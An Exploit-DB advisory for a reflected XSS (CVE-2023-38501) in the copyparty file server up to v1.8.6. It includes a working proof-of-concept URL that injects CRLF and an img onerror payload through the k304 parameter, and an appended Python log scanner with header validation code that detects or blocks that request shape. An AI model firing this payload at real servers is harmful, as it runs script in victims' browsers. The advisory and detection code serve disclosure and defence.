[webapps] copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

source link: https://www.exploit-db.com/exploits/51635

copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)

EDB-ID: 51635
Platform: Python
Date: 2023-07-28

Vulnerable App:

# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501



# Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) attack.

A vulnerability in the application's web interface could allow an attacker to execute malicious JavaScript code by tricking a user into opening a crafted link.

# POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
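The PoC above URL-encodes a double CRLF (%0D%0A%0D%0A) before the HTML, which is the shape of a value that escapes an HTTP header into the response body. The following is an added example, not part of the advisory or of copyparty's own code: it flags such requests in constructed access-log lines and shows the header-building check that stops the reflection. It assumes the k304 value is written into a response header and that the switch only legitimately takes "y" or "n"; both are assumptions, not facts from the page.

```python
# Added example (not copyparty code): detect the CVE-2023-38501 request shape
# in access logs, and refuse control characters when emitting response headers.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real traffic); the second carries the PoC payload.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jul/2023:10:00:01 +0000] "GET /?k304=y HTTP/1.1" 200 512
10.0.0.9 - - [28/Jul/2023:10:00:07 +0000] "GET /?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E HTTP/1.1" 200 512
10.0.0.5 - - [28/Jul/2023:10:00:09 +0000] "GET /files/readme.txt HTTP/1.1" 200 90
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CTRL_RE = re.compile(r"[\r\n\x00]")          # header terminators / NUL
TAG_RE = re.compile(r"<\s*\w")                # start of an HTML tag

def suspicious_requests(log_text: str) -> list[str]:
    """Return request targets whose decoded k304 value contains CR/LF
    (header injection) or an HTML tag (XSS payload)."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        # parse_qs percent-decodes, so %0D%0A becomes a real "\r\n"
        qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if any(CTRL_RE.search(v) or TAG_RE.search(v) for v in qs.get("k304", [])):
            hits.append(target)
    return hits

def header_line(name: str, value: str) -> str:
    """Build 'Name: value\\r\\n', refusing values that could end the header."""
    if CTRL_RE.search(name) or CTRL_RE.search(value):
        raise ValueError("CR, LF and NUL are not allowed in header fields")
    return f"{name}: {value}\r\n"

def header_rejected(value: str) -> bool:
    """True if header_line() refuses the given value."""
    try:
        header_line("Set-Cookie", value)
    except ValueError:
        return True
    return False

def k304_cookie_header(raw: str) -> str:
    """Allow-list the switch value (assumed: 'y' / 'n') instead of reflecting
    whatever arrived in the query string; anything else falls back to 'n'."""
    value = raw if raw in ("y", "n") else "n"
    return header_line("Set-Cookie", f"k304={value}; Path=/; SameSite=Lax")
```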
